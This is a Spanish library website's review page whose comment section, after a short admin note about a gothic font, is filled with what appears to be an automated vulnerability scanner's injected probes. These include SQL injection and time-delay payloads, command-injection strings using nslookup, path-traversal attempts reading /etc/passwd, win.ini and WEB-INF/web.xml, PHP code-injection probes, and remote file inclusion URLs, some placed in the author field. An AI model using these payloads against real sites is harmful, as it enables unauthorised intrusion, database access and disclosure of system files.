ESPAÑOL

 

ENGLISH

0 visitantes y 0 miembros conectados. Conviértase en miembro privilegiado pulsando aquí


  Principal  | • | • | [Anónimo - Connexion] | • | • | Desconectar | • | • | Ayuda
Localizador
Ultimas 24 horas
Páginas vistas en las últimas 24 horas : 78 782
Actividad
Visitas desde el 24/05/2005:
114 275 809
  • Miembros : 72 806
  • Artículos : 26
  • Foros : 7
  • Sujetos : 1
  • Críticas : 49

Top 10  
Estadísticas

Críticas

Añadida: 20-02-2014

Libro de Visitas (con V)
El tipo de letra "gotico" empleado en las imágenes/texto del portal hace confundir la "v" con la "b", la primera se parece a una b, sin embargo es bien una v. Compárese la segunda b de Biblioteca con la v de visitas. No es la primera crítica que recibimos creyendo que hemos cometido una imperdonable falta de ortografía, pero no es así.





Un cordial saludo a todos

La crítica: José Lozano
Nota:
'Hits' : 8586

[ Comentario(s) ]  [ Retorno al índice de las críticas ]

Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


set|set&set
Escrito por Anónimo el 06-04-2020
Mi nota:


$(nslookup HUYDagcZ)
Escrito por Anónimo el 06-04-2020
Mi nota:


&nslookup x5PzMRgU&'"`0&nslookup x5PzMRgU&`'
Escrito por Anónimo el 06-04-2020
Mi nota:


set|set&set
Escrito por Anónimo el 06-04-2020
Mi nota:


$(nslookup L9QmxIzJ)
Escrito por Anónimo el 06-04-2020
Mi nota:


&nslookup 14n8xv4F&'"`0&nslookup 14n8xv4F&`'
Escrito por Anónimo el 06-04-2020
Mi nota:


set|set&set
Escrito por Anónimo el 06-04-2020
Mi nota:


$(nslookup joDVcF1Y)
Escrito por Anónimo el 06-04-2020
Mi nota:


&nslookup CivoDvb6&'"`0&nslookup CivoDvb6&`'
Escrito por Anónimo el 06-04-2020
Mi nota:


${9999714+9999575}
Escrito por Anónimo el 06-04-2020
Mi nota:


${10000273+9999246}
Escrito por Anónimo el 06-04-2020
Mi nota:


${9999416+9999947}
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


-1 OR 2+913-913-1=0+0+0+1 --
Escrito por Anónimo el 06-04-2020
Mi nota:


-1 OR 2+705-705-1=0+0+0+1
Escrito por Anónimo el 06-04-2020
Mi nota:


-1' OR 2+496-496-1=0+0+0+1 --
Escrito por Anónimo el 06-04-2020
Mi nota:


-1' OR 2+629-629-1=0+0+0+1 or 'F9KvUKm4'='
Escrito por Anónimo el 06-04-2020
Mi nota:


-1" OR 2+365-365-1=0+0+0+1 --
Escrito por Anónimo el 06-04-2020
Mi nota:


if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


-1; waitfor delay '0:0:9' --
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


-1); waitfor delay '0:0:9' --
Escrito por Anónimo el 06-04-2020
Mi nota:


1 waitfor delay '0:0:9' --
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


xGLgYMHw'; waitfor delay '0:0:18' --
Escrito por Anónimo el 06-04-2020
Mi nota:


-1;select pg_sleep(18); --
Escrito por Anónimo el 06-04-2020
Mi nota:


-1);select pg_sleep(18); --
Escrito por Anónimo el 06-04-2020
Mi nota:


-1));select pg_sleep(18); --
Escrito por Anónimo el 06-04-2020
Mi nota:


uU18RMcd';select pg_sleep(27); --
Escrito por Anónimo el 06-04-2020
Mi nota:


HtlEyypV');select pg_sleep(27); --
Escrito por Anónimo el 06-04-2020
Mi nota:


ghjRMXhj'));select pg_sleep(27); --
Escrito por ${9999452+9999649} el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por ${9999213+9999362} el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por ${9999076+10000245} el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


-1 OR 2+857-857-1=0+0+0+1 --
Escrito por Anónimo el 06-04-2020
Mi nota:


-1 OR 2+729-729-1=0+0+0+1
Escrito por Anónimo el 06-04-2020
Mi nota:


-1' OR 2+549-549-1=0+0+0+1 --
Escrito por Anónimo el 06-04-2020
Mi nota:


-1' OR 2+544-544-1=0+0+0+1 or 'tAch9d8v'='
Escrito por Anónimo el 06-04-2020
Mi nota:


-1" OR 2+496-496-1=0+0+0+1 --
Escrito por Anónimo el 06-04-2020
Mi nota:


if(now()=sysdate(),sleep(10),0)/*'XOR(if(now()=sysdate(),sleep(10),0))OR'"XOR(if(now()=sysdate(),sleep(10),0))OR"*/
Escrito por Anónimo el 06-04-2020
Mi nota:


(select(0)from(select(sleep(10)))v)/*'+(select(0)from(select(sleep(10)))v)+'"+(select(0)from(select(sleep(10)))v)+"*/
Escrito por Anónimo el 06-04-2020
Mi nota:


-1; waitfor delay '0:0:10' --
Escrito por set|set&set el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


-1); waitfor delay '0:0:20' --
Escrito por $(nslookup sjKtbufS) el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1 waitfor delay '0:0:20' --
Escrito por &nslookup wSAwwWOx&'\"`0& el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1tELt5zU'; waitfor delay '0:0:20' --
Escrito por set|set&set el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


-1;select pg_sleep(20); --
Escrito por $(nslookup 8zqQne71) el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


-1);select pg_sleep(30); --
Escrito por &nslookup 74UAaELH&'\"`0& el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


-1));select pg_sleep(30); --
Escrito por set|set&set el 06-04-2020
Mi nota:


1
Escrito por $(nslookup RBKfAIr2) el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


LSxL4rzi';select pg_sleep(30); --
Escrito por &nslookup 73LrEwma&'\"`0& el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


RQr1QZS1');select pg_sleep(30); --
Escrito por Anónimo el 06-04-2020
Mi nota:


q3UH2psQ'));select pg_sleep(10); --
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


-1 OR 2+711-711-1=0+0+0+1 --
Escrito por Anónimo el 06-04-2020
Mi nota:


-1 OR 2+485-485-1=0+0+0+1
Escrito por Anónimo el 06-04-2020
Mi nota:


-1' OR 2+387-387-1=0+0+0+1 --
Escrito por Anónimo el 06-04-2020
Mi nota:


http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
Escrito por Anónimo el 06-04-2020
Mi nota:


1some_inexistent_file_with_long_name
Escrito por Anónimo el 06-04-2020
Mi nota:


-1' OR 2+358-358-1=0+0+0+1 or 'wm0T3XZi'='
Escrito por Anónimo el 06-04-2020
Mi nota:


Http://testasp.vulnweb.com/t/fit.txt
Escrito por Anónimo el 06-04-2020
Mi nota:


-1" OR 2+683-683-1=0+0+0+1 --
Escrito por Anónimo el 06-04-2020
Mi nota:


http://testasp.vulnweb.com/t/fit.txt?.jpg
Escrito por Anónimo el 06-04-2020
Mi nota:


if(now()=sysdate(),sleep(11),0)/*'XOR(if(now()=sysdate(),sleep(11),0))OR'"XOR(if(now()=sysdate(),sleep(11),0))OR"*/
Escrito por Anónimo el 06-04-2020
Mi nota:


testasp.vulnweb.com
Escrito por Anónimo el 06-04-2020
Mi nota:


(select(0)from(select(sleep(11)))v)/*'+(select(0)from(select(sleep(11)))v)+'"+(select(0)from(select(sleep(11)))v)+"*/
Escrito por Anónimo el 06-04-2020
Mi nota:


http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
Escrito por Anónimo el 06-04-2020
Mi nota:


-1; waitfor delay '0:0:11' --
Escrito por Anónimo el 06-04-2020
Mi nota:


1some_inexistent_file_with_long_name
Escrito por Anónimo el 06-04-2020
Mi nota:


-1); waitfor delay '0:0:11' --
Escrito por Anónimo el 06-04-2020
Mi nota:


Http://testasp.vulnweb.com/t/fit.txt
Escrito por Anónimo el 06-04-2020
Mi nota:


1 waitfor delay '0:0:11' --
Escrito por Anónimo el 06-04-2020
Mi nota:


http://testasp.vulnweb.com/t/fit.txt?.jpg
Escrito por Anónimo el 06-04-2020
Mi nota:


oAKZj278'; waitfor delay '0:0:22' --
Escrito por Anónimo el 06-04-2020
Mi nota:


testasp.vulnweb.com
Escrito por Anónimo el 06-04-2020
Mi nota:


-1;select pg_sleep(22); --
Escrito por Anónimo el 06-04-2020
Mi nota:


http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
Escrito por Anónimo el 06-04-2020
Mi nota:


-1);select pg_sleep(22); --
Escrito por Anónimo el 06-04-2020
Mi nota:


1some_inexistent_file_with_long_name
Escrito por Anónimo el 06-04-2020
Mi nota:


-1));select pg_sleep(22); --
Escrito por Anónimo el 06-04-2020
Mi nota:


Http://testasp.vulnweb.com/t/fit.txt
Escrito por Anónimo el 06-04-2020
Mi nota:


2zFduEVk';select pg_sleep(22); --
Escrito por Anónimo el 06-04-2020
Mi nota:


http://testasp.vulnweb.com/t/fit.txt?.jpg
Escrito por Anónimo el 06-04-2020
Mi nota:


GyqhBipP');select pg_sleep(22); --
Escrito por Anónimo el 06-04-2020
Mi nota:


testasp.vulnweb.com
Escrito por Anónimo el 06-04-2020
Mi nota:


K4Bt6Avp'));select pg_sleep(33); --
Escrito por YkZzQzN4UUdhZ1hZ el 06-04-2020
Mi nota:


1
Escrito por NnMzaWRIem9qZ0Nq el 06-04-2020
Mi nota:


1
Escrito por U2N1a1hRYVJxQ1Bn el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


)
Escrito por Anónimo el 06-04-2020
Mi nota:


!(()&&!|*|*|
Escrito por Anónimo el 06-04-2020
Mi nota:


^(#$!@#$)(()))******
Escrito por Anónimo el 06-04-2020
Mi nota:


)
Escrito por Anónimo el 06-04-2020
Mi nota:


!(()&&!|*|*|
Escrito por Anónimo el 06-04-2020
Mi nota:


^(#$!@#$)(()))******
Escrito por Anónimo el 06-04-2020
Mi nota:


)
Escrito por Anónimo el 06-04-2020
Mi nota:


!(()&&!|*|*|
Escrito por Anónimo el 06-04-2020
Mi nota:


^(#$!@#$)(()))******
Escrito por Anónimo el 06-04-2020
Mi nota:


Escrito por Anónimo el 06-04-2020
Mi nota:


'"()
Escrito por Anónimo el 06-04-2020
Mi nota:


Escrito por Anónimo el 06-04-2020
Mi nota:


'"()
Escrito por Anónimo el 06-04-2020
Mi nota:


Escrito por Anónimo el 06-04-2020
Mi nota:


'"()
Escrito por Anónimo el 06-04-2020
Mi nota:


../../../../../../../../../../etc/passwd
Escrito por Anónimo el 06-04-2020
Mi nota:


../../../../../../../../../../../../../../../proc/version
Escrito por Anónimo el 06-04-2020
Mi nota:


..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
Escrito por Anónimo el 06-04-2020
Mi nota:


../../../../../../../../../../etc/passwd
Escrito por Anónimo el 06-04-2020
Mi nota:


..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
Escrito por Anónimo el 06-04-2020
Mi nota:


/../..//../..//../..//../..//../..//etc/passwd
Escrito por Anónimo el 06-04-2020
Mi nota:


../../../../../../etc/passwd
Escrito por Anónimo el 06-04-2020
Mi nota:


/etc/passwd
Escrito por Anónimo el 06-04-2020
Mi nota:


%2fetc%2fpasswd
Escrito por Anónimo el 06-04-2020
Mi nota:


/.././.././.././.././.././.././.././../etc/./passwd%00
Escrito por Anónimo el 06-04-2020
Mi nota:


../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
Escrito por Anónimo el 06-04-2020
Mi nota:


../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
Escrito por Anónimo el 06-04-2020
Mi nota:


................etc/passwd
Escrito por Anónimo el 06-04-2020
Mi nota:


invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
Escrito por Anónimo el 06-04-2020
Mi nota:


file:///etc/passwd
Escrito por Anónimo el 06-04-2020
Mi nota:


/../../../../../../../etc/passwd
Escrito por Anónimo el 06-04-2020
Mi nota:


WEB-INF/web.xml
Escrito por Anónimo el 06-04-2020
Mi nota:


/WEB-INF/web.xml
Escrito por Anónimo el 06-04-2020
Mi nota:


WEB-INFweb.xml
Escrito por Anónimo el 06-04-2020
Mi nota:


../../../../../../../../../../windows/win.ini
Escrito por Anónimo el 06-04-2020
Mi nota:


../../../../../../../../../../boot.ini
Escrito por Anónimo el 06-04-2020
Mi nota:


../../../../../../../../../../windows/win.ini
Escrito por Anónimo el 06-04-2020
Mi nota:


windowswin.ini
Escrito por Anónimo el 06-04-2020
Mi nota:


................windowswin.ini
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


................windowswin.ini
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


/../../../../../../windows/win.ini
Escrito por Anónimo el 06-04-2020
Mi nota:


../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
Escrito por Anónimo el 06-04-2020
Mi nota:


../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
Escrito por Anónimo el 06-04-2020
Mi nota:


WEB-INF/web.xml
Escrito por Anónimo el 06-04-2020
Mi nota:


WEB-INFweb.xml
Escrito por Anónimo el 06-04-2020
Mi nota:


../../../../../../../../../../etc/passwd
Escrito por Anónimo el 06-04-2020
Mi nota:


../../../../../../../../../../../../../../../proc/version
Escrito por Anónimo el 06-04-2020
Mi nota:


..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
Escrito por Anónimo el 06-04-2020
Mi nota:


../../../../../../../../../../etc/passwd
Escrito por Anónimo el 06-04-2020
Mi nota:


..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
Escrito por Anónimo el 06-04-2020
Mi nota:


/../..//../..//../..//../..//../..//etc/passwd
Escrito por Anónimo el 06-04-2020
Mi nota:


../../../../../../etc/passwd
Escrito por Array el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


/etc/passwd
Escrito por '"() el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


%2fetc%2fpasswd
Escrito por Array el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


/.././.././.././.././.././.././.././../etc/./passwd%00
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por '"() el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Array el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
Escrito por Anónimo el 06-04-2020
Mi nota:


................etc/passwd
Escrito por '"() el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
Escrito por Anónimo el 06-04-2020
Mi nota:


file:///etc/passwd
Escrito por Anónimo el 06-04-2020
Mi nota:


/../../../../../../../etc/passwd
Escrito por Anónimo el 06-04-2020
Mi nota:


WEB-INF/web.xml
Escrito por Anónimo el 06-04-2020
Mi nota:


/WEB-INF/web.xml
Escrito por Anónimo el 06-04-2020
Mi nota:


WEB-INFweb.xml
Escrito por Anónimo el 06-04-2020
Mi nota:


../../../../../../../../../../windows/win.ini
Escrito por Anónimo el 06-04-2020
Mi nota:


../../../../../../../../../../boot.ini
Escrito por Anónimo el 06-04-2020
Mi nota:


../../../../../../../../../../windows/win.ini
Escrito por Anónimo el 06-04-2020
Mi nota:


windowswin.ini
Escrito por Anónimo el 06-04-2020
Mi nota:


................windowswin.ini
Escrito por Anónimo el 06-04-2020
Mi nota:


................windowswin.ini
Escrito por Anónimo el 06-04-2020
Mi nota:


/../../../../../../windows/win.ini
Escrito por Anónimo el 06-04-2020
Mi nota:


../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
Escrito por Anónimo el 06-04-2020
Mi nota:


../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
Escrito por Anónimo el 06-04-2020
Mi nota:


WEB-INF/web.xml
Escrito por Anónimo el 06-04-2020
Mi nota:


WEB-INFweb.xml
Escrito por ) el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


../../../../../../../../../../etc/passwd
Escrito por !(()&&!|*|*| el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


../../../../../../../../../../../../../../../proc/version
Escrito por ^(#$!@#$)(()))****** el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
Escrito por ) el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


../../../../../../../../../../etc/passwd
Escrito por !(()&&!|*|*| el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
Escrito por ^(#$!@#$)(()))****** el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


/../..//../..//../..//../..//../..//etc/passwd
Escrito por ) el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


../../../../../../etc/passwd
Escrito por !(()&&!|*|*| el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


/etc/passwd
Escrito por ^(#$!@#$)(()))****** el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


%2fetc%2fpasswd
Escrito por Anónimo el 06-04-2020
Mi nota:


/.././.././.././.././.././.././.././../etc/./passwd%00
Escrito por Anónimo el 06-04-2020
Mi nota:


../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
Escrito por Anónimo el 06-04-2020
Mi nota:


../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
Escrito por Anónimo el 06-04-2020
Mi nota:


................etc/passwd
Escrito por Anónimo el 06-04-2020
Mi nota:


invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
Escrito por Anónimo el 06-04-2020
Mi nota:


;print(md5(acunetix_wvs_security_test));
Escrito por Anónimo el 06-04-2020
Mi nota:


file:///etc/passwd
Escrito por Anónimo el 06-04-2020
Mi nota:


';print(md5(acunetix_wvs_security_test));$a='
Escrito por Anónimo el 06-04-2020
Mi nota:


/../../../../../../../etc/passwd
Escrito por Anónimo el 06-04-2020
Mi nota:


";print(md5(acunetix_wvs_security_test));$a="
Escrito por Anónimo el 06-04-2020
Mi nota:


WEB-INF/web.xml
Escrito por Anónimo el 06-04-2020
Mi nota:


${@print(md5(acunetix_wvs_security_test))}
Escrito por Anónimo el 06-04-2020
Mi nota:


/WEB-INF/web.xml
Escrito por Anónimo el 06-04-2020
Mi nota:


WEB-INFweb.xml
Escrito por Anónimo el 06-04-2020
Mi nota:


;print(md5(acunetix_wvs_security_test));
Escrito por Anónimo el 06-04-2020
Mi nota:


../../../../../../../../../../windows/win.ini
Escrito por Anónimo el 06-04-2020
Mi nota:


';print(md5(acunetix_wvs_security_test));$a='
Escrito por Anónimo el 06-04-2020
Mi nota:


../../../../../../../../../../boot.ini
Escrito por Anónimo el 06-04-2020
Mi nota:


";print(md5(acunetix_wvs_security_test));$a="
Escrito por Anónimo el 06-04-2020
Mi nota:


../../../../../../../../../../windows/win.ini
Escrito por Anónimo el 06-04-2020
Mi nota:


${@print(md5(acunetix_wvs_security_test))}
Escrito por Anónimo el 06-04-2020
Mi nota:


windowswin.ini
Escrito por Anónimo el 06-04-2020
Mi nota:


................windowswin.ini
Escrito por Anónimo el 06-04-2020
Mi nota:


................windowswin.ini
Escrito por Anónimo el 06-04-2020
Mi nota:


;print(md5(acunetix_wvs_security_test));
Escrito por Anónimo el 06-04-2020
Mi nota:


/../../../../../../windows/win.ini
Escrito por Anónimo el 06-04-2020
Mi nota:


';print(md5(acunetix_wvs_security_test));$a='
Escrito por Anónimo el 06-04-2020
Mi nota:


";print(md5(acunetix_wvs_security_test));$a="
Escrito por Anónimo el 06-04-2020
Mi nota:


reviews.php
Escrito por Anónimo el 06-04-2020
Mi nota:


../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
Escrito por Anónimo el 06-04-2020
Mi nota:


${@print(md5(acunetix_wvs_security_test))}
Escrito por Anónimo el 06-04-2020
Mi nota:


reviews.php
Escrito por Anónimo el 06-04-2020
Mi nota:


../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
Escrito por Anónimo el 06-04-2020
Mi nota:


reviews.php/.
Escrito por Anónimo el 06-04-2020
Mi nota:


reviews.php
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


WEB-INF/web.xml
Escrito por Anónimo el 06-04-2020
Mi nota:


reviews.php
Escrito por Anónimo el 06-04-2020
Mi nota:


WEB-INFweb.xml
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


reviews.php/.
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


reviews.php
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


reviews.php
Escrito por Anónimo el 06-04-2020
Mi nota:


1
Escrito por Anónimo el 06-04-2020
Mi nota:


reviews.php/.
Escrito por http://some-inexistent-we el 06-04-2020
Mi nota:


1
Escrito por 1some_inexistent_file_wit el 06-04-2020
Mi nota:


1
Escrito por Http://testasp.vulnweb.co el 06-04-2020
Mi nota:


1
Escrito por http://testasp.vulnweb.co el 06-04-2020
Mi nota:


1
Escrito por testasp.vulnweb.com el 06-04-2020
Mi nota:


1
Escrito por http://some-inexistent-we el 06-04-2020
Mi nota:


1
Escrito por 1some_inexistent_file_wit el 06-04-2020
Mi nota:


1
Escrito por Http://testasp.vulnweb.co el 06-04-2020
Mi nota:


1
Escrito por http://testasp.vulnweb.co el 06-04-2020
Mi nota:


1
Escrito por testasp.vulnweb.com el 06-04-2020
Mi nota:


1
Escrito por http://some-inexistent-we el 06-04-2020
Mi nota:


1
Escrito por 1some_inexistent_file_wit el 06-04-2020
Mi nota:


1
